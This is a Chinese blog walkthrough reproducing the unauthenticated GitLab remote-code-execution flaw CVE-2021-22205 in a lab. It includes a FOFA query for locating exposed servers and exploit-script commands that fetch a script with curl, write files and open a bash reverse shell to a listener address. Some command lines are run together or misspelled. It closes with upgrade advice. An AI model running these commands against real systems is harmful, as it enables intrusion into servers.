资讯专栏INFORMATION COLUMN

Gitlab无需认证RCE漏洞复现(CVE-2021-22205)

frank_fun / 4091人阅读

摘要:免责声明本文档供学习,请使用者注意使用环境并遵守国家相关法律法规由于使用不当造成的后果上传者概不负责摘抄为世界进文明,为人类造幸福,以青春之我,创建青春之家庭,青春之国家,青春之民族,青春之人类,青春之地球,青春之宇宙,资以乐其无涯之生。

gitlab介绍

  • GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。
  • GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。

漏洞介绍

  • 由于 GitLab 没有正确验证传递给文件解析器的图像文件,攻击者可利用该漏洞在服务端进行远程命令执行。
  • 由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,社区版(CE)和企业版(EE)皆受影响。
  • 4月15日,GitLab官方发布安全更新修复了此GitLab命令执行漏洞(CVE-2021-22205),由于GitLab中的ExifTool没有对传入的图像文件的扩展名进行正确处理,攻击者通过上传特制的恶意图片,可以在目标服务器上执行任意命令。

漏洞编号

  • CVE-2021-22205

漏洞等级

该漏洞CVSS评分:9.9
危害等级:严重

影响版本

11.9 <= Gitlab CE/EE < 13.8.8
13.9 <= Gitlab CE/EE < 13.9.6
13.10 <= Gitlab CE/EE < 13.10.3

FOFA 查询

app="GitLab"

环境搭建(vulhub环境搭建)


漏洞复现

https://github.com/Al1ex/CVE-2021-22205

第一步 漏洞检测

python CVE-2021-22205.py -v true -t http://192.168.253.134:8080

第二步 dnslog解析

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "ping "

第三步 服务器写入文件

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.sh"python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "test > /tmp/1.txt"

第三步 反弹shell

python CVE-2021-22205.py  -a  true -t http://192.168.253.134:8080/ -c "echo "bash -i >& /dev/tcp/192.168.253.128/4444 0>&1" > /tmp/1.shpython CVE-2021-22205.py  -a  true -t http://192.168.253.134:8080/ -c "chmod +x /tmp/1.sh"python3 CVE-2021-2205.py -a true -t http://192.168.253.134:8080/ -c "/bin/bahs /tmp/1.sh"


修复建议

  • 官方升级

目前官方已发布新版本修复了该漏洞,请受影响的用户尽快升级至最新版本进行防护,
官方下载链接:https://about.gitlab.com/update/

  • 临时防护措施

若相关用户暂时无法进行升级操作,可使用白名单限制对Web端口的访问。

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责

摘抄


为世界进文明,为人类造幸福,

以青春之我,创建青春之家庭,青春之国家,

青春之民族,青春之人类,青春之地球,

青春之宇宙,资以乐其无涯之生。

– 李大钊 《觉醒年代》


文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/123538.html

相关文章

  • [Vulhub] Spring漏洞复现

    摘要:源码分析漏洞复现访问输入认证登录请求,表达式已成功执行并返回结果。漏洞分析大多数仅支持请求并仅显示敏感的配置数据,如果使用了不当的端点,可能会产生甚至是安全问题。 ...

    Leo_chen 评论0 收藏0
  • 补丁已发布近半年,50%联网的GitLab仍受到RCE缺陷漏洞影响

    摘要:发布的分析写道。尽管补丁已经公开发布了个多月,但在个面向互联网的安装中的安装已经针对这个问题打了完整的补丁。的安装可能存在或不存在漏洞。此外,理想情况下,不应该是面向的服务。 尽管该漏洞最初被认为是经过身份验证的RCE 案例并分配了9.9的CVSS评分,但由于未经身份验证的威胁行为者也可能触发该漏洞,因此严重性评级在2021年9月21日修订为10.0。 该漏洞存在于ExifToo...

    sherlock221 评论0 收藏0
  • shiro反序列化漏洞复现

    摘要:目录简介靶场环境漏洞复现一手工复现二图形化工具简介是一个强大易用的安全框架,提供了认证授权加密和会话管理等功能。 目录 简介:靶场环境漏洞复现一、手工复现二、图形...

    Chao 评论0 收藏0
  • Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882,CVE-2020-

    摘要:将的动态功能和标准的安全性引入大型网络应用的开发集成部署和管理之中。使用这两个漏洞组成的利用链,可通过一个请求在远程服务器上以未授权的任意用户身份执行命令。这个漏洞的利用方式有两种,一是通过,二是通过。 一、软件介绍 WebLogic是美国Oracle公司出品的一个application s...

    zhongmeizhi 评论0 收藏0
  • weblogic漏洞总结复现

    摘要:在当前页面抓包后修改内容,写入冰蝎脚本文件。添加的内容为实现反弹。影响范围相关漏洞有复现过程环境这里先使用扫描一下是否开启了服务。使用工具写入。 目录 简介Web...

    glumes 评论0 收藏0

发表评论

0条评论

最新活动
阅读需要支付1元查看
<